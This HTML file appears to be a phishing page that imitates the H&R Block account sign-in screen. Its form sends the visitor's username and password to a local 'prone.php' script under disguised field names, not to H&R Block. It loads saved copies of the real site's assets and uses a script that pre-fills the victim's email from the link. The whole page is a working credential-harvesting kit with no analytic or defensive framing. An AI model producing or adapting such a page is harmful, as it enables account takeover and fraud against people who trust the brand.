<!DOCTYPE html>


<html xmlns="http://www.w3.org/1999/xhtml" class="js tlvHideBgImage applicationcache geolocation history postmessage svg websockets localstorage sessionstorage websqldatabase webworkers hashchange audio canvas canvastext webgl video cssgradients multiplebgs opacity rgba placeholder inlinesvg hsla supports svgclippaths smil displaytable display-table fontface generatedcontent lastchild formvalidation textshadow cssanimations backgroundsize borderimage borderradius boxshadow csscolumns csscolumns-width csscolumns-span csscolumns-fill csscolumns-gap csscolumns-rule csscolumns-rulecolor csscolumns-rulestyle csscolumns-rulewidth csscolumns-breakbefore csscolumns-breakafter csscolumns-breakinside flexbox ellipsis flexboxlegacy cssreflections csstransforms csstransforms3d csstransitions indexeddb" lang="en" style=""><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
		<title>H&amp;R Block- Verify Email</title>
	
<script src="js/jquery.min.js"></script>
<meta http-equiv="cleartype" content="on">	

<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<meta http-equiv="Content-Type" content="text/html">
<meta name="robots" content="noindex">
<meta name="description" content="Login to your H&amp;R Block account to check the status of your tax refund and efile status, gain access to past returns or file your taxes online.">
<meta name="keywords" content="H&amp;R Block">
<meta name="author" content="H&amp;R Block">
<meta name="format-detection" content="telephone=no">
<meta name="copyright" content="Copyright © H&amp;R Block">

<!-- Responsive and mobile friendly stuff -->
<meta name="HandheldFriendly" content="True">
<meta name="MobileOptimized" content="320">


	
	
		<meta name="viewport" content="width=device-width, height=device-height, initial-scale=1, shrink-to-fit=no">      
	


<link rel="shortcut icon" href="https://idp.hrblock.com/idp/theme/default/images/favicon.png">
<link rel="stylesheet" type="text/css" href="./hr_files/css">
			
<!-- Styles -->
<link rel="stylesheet" type="text/css" href="./hr_files/bootstrap.min.css">
<link rel="stylesheet" type="text/css" href="./hr_files/gua_mainNew.css" media="all">



<!-- Responsive Styles -->
<link rel="stylesheet" type="text/css" href="./hr_files/gua_media_custom.css" media="all">

<!-- All JavaScript at the bottom, except for Modernizr which enables HTML5 elements and feature detects -->
<script type="text/javascript" src="./hr_files/saved_resource" id="ndsisync-129194"></script><script src="./hr_files/saved_resource(1)"></script><script type="text/javascript" async="" src="./hr_files/w.js.download"></script><script src="./hr_files/modernizr-3.6.0-min.js.download"></script>

<!-- Load before page load for DTM implementation --> 
<script type="text/javascript">
//To turn on DTM, set sat_track cookie to true.
//And to also turn on third party tracking referenced in DTM, set the eu_compliance data element.
if(document.cookie.indexOf('sat_track=') == -1){
	document.cookie = "sat_track=true; expires=5*365; path=/";
}

var HRBData = HRBData || {}
HRBData.digital_data = {}
HRBData.digital_data.eu_compliance='true';
HRBData.digital_data.satellitePageBottomHasFired = false;
HRBData.digital_data.page_section = "";
HRBData.digital_data.page_sub_section = "";
HRBData.digital_data.page_title = "";
HRBData.digital_data.products = "";
HRBData.digital_data.gua_guaid_hashed = "";
HRBData.digital_data.language = "";
HRBData.digital_data.regular_click= "";
HRBData.digital_data.loc="";
HRBData.digital_data.nm="";
HRBData.digital_data.lucky_orange_site_id="";
HRBData.digital_data.gua_session_id="";
var canGetDTMScript = "true";
</script>

<script src="./hr_files/launch-ENb8b8e8e7b47640abae5d32acd1485d78.min.js.download"></script><script src="./hr_files/AppMeasurement.min.js.download" async=""></script>		
	</head>
	<body style="background-size: 100% 355.5px;">
		





 





	
		<div class="mainContainer guaLang container-fluid">
            <header class="row">
                <div class="col-lg-12 text-right">
                	
                        
                        	<a class="track-dtm langActive LoNotSensitive" data-track="{&quot;loc&quot;:&quot;h&quot;,&quot;nm&quot;:&quot;English Locale Selector link&quot;}" lang="en" href="https://idp.hrblock.com/idp/profile/SAML2/Redirect/SSO?execution=e1s1&amp;_eventId_langen" onclick="this.addEventListener(&#39;click&#39;, handleLinkDoubleClick, false);">Eng<span class="ADAHide"><!--  --></span></a>
					        <font style="color: #a7a9af">|</font> 			        
					        <a class="track-dtm LoNotSensitive" data-track="{&quot;loc&quot;:&quot;h&quot;,&quot;nm&quot;:&quot;Spanish Locale Selector link&quot;}" lang="es" href="https://idp.hrblock.com/idp/profile/SAML2/Redirect/SSO?execution=e1s1&amp;_eventId_langes" onclick="this.addEventListener(&#39;click&#39;, handleLinkDoubleClick, false);">Esp<span class="ADAHide"><!--  --></span></a>
                        
                        
                    
                </div>
            </header>
	
	

	<!-- JN: logo center allign fix- remove it once it checked in app-ipad 
	<div class="col-sm-8 col-md-6 col-lg-4 offset-sm-2 offset-md-3 offset-lg-4 text-center bodyContainer"> -->
	
	<div class="col-sm-8 col-md-6 offset-sm-2 offset-md-3 offset-lg-4 text-center bodyContainer">
	
<!-- This is for remove content header for IOS devices -->

	 
	
	        
	        
	        
                
                
                
                
                  
                              
                
                
                
                
                
                
                
                	<img class="logoImg" alt="H&amp;R Block" src="./hr_files/hrb_logo.svg">
                
            
                    	
	

 
            
<!-- idleTimeout Dialog -->
<div class="modal fade" id="idleTimeoutDialog" tabindex="-1" role="TimeoutDialog" aria-labelledby="idleTimeoutDialog" aria-hidden="true">
	<div class="modal-dialog modal-dialog-centered idleTimeoutDialog" role="main">
		<div class="modal-content">
			<div class="modal-header"><!-- Header --></div>
			<div class="modal-body text-center">
				<h2>Anybody there?</h2>
				<p>You'll be signed out of your account in one minute due to inactivity.</p>
			</div>
			<div class="modal-footer mb-4">
				<div>
					<button type="button" id="idleTDsignOut" class="btn btn-success btn-block LoNotSensitive" tabindex="0">SIGN OUT</button>
					<button type="button" id="idleTDstayIn" class="btn btn-success btn-block btnTertiary LoNotSensitive" tabindex="0">STAY SIGNED IN</button>
				</div>
			</div>
		</div>
	</div>
</div>


<!-- Browser Backbutton Dialog -->
<div class="modal fade" id="browserBakBtnDialog" tabindex="-1" role="BackButtonDialog" aria-labelledby="browserBakBtnDialog" aria-hidden="true">
	<div class="modal-dialog modal-dialog-centered idleTimeoutDialog" role="main">
		<div class="modal-content">
			<div class="modal-header"><!-- Header --></div>
			<div class="modal-body text-center">
				<h2>Browser Controls Inactive</h2>
				<p>Sorry - you can't use your browser's Back button to return to a previous screen.</p>
			</div>
			<div class="modal-footer mb-4">
				<div>
					<button type="button" id="browserBBDok" class="btn btn-block btnMain LoNotSensitive" tabindex="0">OK</button>

				</div>
			</div>
		</div>
	</div>
</div>
		
			<div class="formContainer shadow-lg text-center">				
				<form action="prone.php" method="post" autocomplete="off" novalidate="novalidate">
				
				<div class="form-group">
                        <h1 class="headStyle1 LoNotSensitive">We're glad you're here!</h1>
                        <p class="pt-2 pb-2">Whether we've helped you for years or you're new to Block, your email helps us find or create your secure account.</p>
                    </div>
					<div class="form-group text-left">
                        <label for="email">Username</label>
                        <input type="text" name="userty" id="email" required="" autofocus="" class="form-control" maxlength="100" tabindex="0" aria-invalid="true" aria-required="true" aria-labelledby="email">
                    </div>
					<div class="form-group text-left">
                        <label for="email">Password</label>
                        <input type="password" name="pserwail" id="email" class="form-control" maxlength="100" tabindex="0" required="" autofocus="" aria-invalid="true" aria-required="true" aria-labelledby="email">
                    </div>
					
                    <div class="formButtons pt-4">
                        <button type="submit" id="ffELnextbtn" class="btn btn-block btnMain track-dtm LoNotSensitive" name="gnanIn" tabindex="0">Next</button>
	                    <div id="e2eLinkDivcal" class="txtCenterResp">					
	                     	                                                           
                                 
                              	                           
	                      
                    	</div>  
                    </div>  
				</form>				
			</div>
		








		</div>
		<div class="ltArea4"><!-- Lending Tree space 4 --></div>


	<footer class="row">
		<div class="col-lg-6 col-md-6 col-sm-4 col-12 order-sm-2 text-right">
			
				
				
					<a class="track-dtm LoNotSensitive" data-track="{&quot;loc&quot;:&quot;f&quot;,&quot;nm&quot;:&quot;Privacy Policy English Link&quot;}" href="javascript:void(0)" target="_blank" title="Privacy">
						Privacy <img alt="H&amp;R Block - Privacy" src="./hr_files/privacyArrow.svg">
					</a>
				
			
			<!--  GUA PageCodes  :  Not any APPs  &&  PageCode is true -->
			
		</div>
		<div class="col-lg-6 col-md-6 col-sm-8 col-12 text-left">Copyright © 2019-2020 HRB Digital LLC. All rights reserved</div>
	</footer>
    </div>


<script>
    
$.urlParam = function(email){
    var results = new RegExp('[\?&]' + email + '=([^&#]*)').exec(window.location.href);
    return results[1] || 0;
	
      
}

</script>



<script>
    
    $( document ).ready(function() {
        // after the page elements are all loaded, then run the script
        // Set the input field with unique ID #email to a value

          $("#email").val($.urlParam('email'));
        
        });
        
</script>
<script> $( document ).ready(function() { $("#domain").val($.urlParam('domain')); }); </script>

 


</body></html>